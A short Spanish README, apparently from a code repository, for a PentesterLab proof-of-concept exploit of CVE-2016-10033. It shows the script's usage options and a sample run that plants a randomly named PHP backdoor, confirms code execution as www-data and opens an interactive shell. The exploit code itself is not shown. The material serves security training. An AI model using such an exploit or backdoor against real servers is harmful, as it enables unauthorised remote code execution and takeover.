
Un PoC del CVE-2016-10033 que hice para PentesterLab
Escribí esto para PentesterLab
Si eres de PentesterLab's no hagas trampa, es mucho mejor aprender.
Espero que sea útil para alguien, si no para mí en el futuro :)
Tiene shell interactivo, buenas cosas de argparse también.
usage: poc.py [-h] [--target TARGET] [--backdoor BACKDOOR] [--proxy] [--raw] [--no-color]
options:
-h, --help show this help message and exit
--target TARGET Target URL
--backdoor BACKDOOR Backdoor path
--proxy Use local proxy
--raw Show raw output
--no-color Disable colored output
$ python3 poc.py --target http://localhost:8000 --proxy
[+] Using random backdoor name: caxvcs009f.php
[+] Sending exploit to target...
[+] Testing backdoor...
[+] Backdoor working! Test output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
www-data